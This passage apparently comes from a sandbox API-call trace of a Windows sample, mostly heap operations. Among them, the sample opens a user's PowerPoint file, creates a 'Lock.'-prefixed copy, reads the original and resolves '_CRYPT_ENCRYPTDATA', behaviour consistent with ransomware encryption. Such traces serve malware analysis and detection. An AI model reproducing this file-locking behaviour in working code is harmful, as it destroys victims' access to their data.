Flags=0x0, Size=0x38) returned 0x2e77788 [0267.640] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0267.640] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0267.640] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0267.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0267.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0267.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0267.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0267.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0267.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0267.640] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0267.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0267.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0267.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0267.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0267.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0267.641] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/vai5o9F.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\vai5o9f.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0267.642] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0267.642] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0267.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0267.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0267.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0267.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0267.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0267.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0267.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0267.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0267.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0267.642] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0267.642] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0267.642] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0267.642] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0267.643] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0267.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0267.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0267.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0267.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0267.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0267.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0267.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0267.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0267.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0267.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0267.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e565e8 [0267.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0267.643] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0267.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0267.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0267.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0267.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be08a8 [0267.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0267.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0267.644] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/Lock.vai5o9F.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\lock.vai5o9f.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0267.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0267.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0267.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0267.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0267.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0267.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0267.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0267.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0267.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0267.645] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0267.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0267.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0267.645] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0267.645] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0267.645] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0267.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0267.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0267.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0267.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0267.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0267.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0267.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0267.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0267.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0267.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0267.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0267.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0267.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0267.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0267.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x125c020 [0267.650] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0267.650] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0267.653] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x1319, lpOverlapped=0x0) returned 1 [0267.653] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0267.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0267.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0267.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0267.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0267.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11319) returned 0x2f16018 [0267.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x125c020 | out: hHeap=0x970000) returned 1 [0267.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0267.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0267.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0267.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0267.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0267.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0267.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0267.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0267.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11319) returned 0x2f27340 [0267.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0267.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0267.661] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0267.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0267.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0267.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0267.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0267.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11319) returned 0x2f16018 [0267.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0267.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0267.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0267.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0267.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0267.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0267.662] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0267.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0267.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0267.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0267.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0267.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0267.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0267.662] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0267.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0267.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0267.662] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0267.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0267.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0267.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0267.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c48 [0267.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0267.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0267.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0267.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0267.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11319) returned 0x2f16018 [0267.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0267.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e18 [0267.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0267.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0267.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0267.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ec8 [0267.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0267.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0267.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0267.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ee8 [0267.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0267.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0267.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0267.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51880 [0267.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0267.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0267.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0267.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0267.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0267.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11319) returned 0x2f38668 [0267.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0267.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0267.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0267.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0267.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0267.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0267.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0267.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0267.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0267.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0267.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0267.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0267.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0267.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0267.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0267.728] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0267.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0267.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0267.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0267.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0267.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0267.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0267.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0267.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0267.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0267.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0267.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0267.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0267.728] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0267.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0267.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0267.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0267.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0267.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0267.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0267.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0267.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0267.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0267.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0267.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0267.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0267.729] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0267.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0267.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0267.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0267.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0267.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0267.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0267.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0267.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0267.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0267.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0267.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0267.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0267.730] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0267.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0267.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0267.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0267.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0267.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0267.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 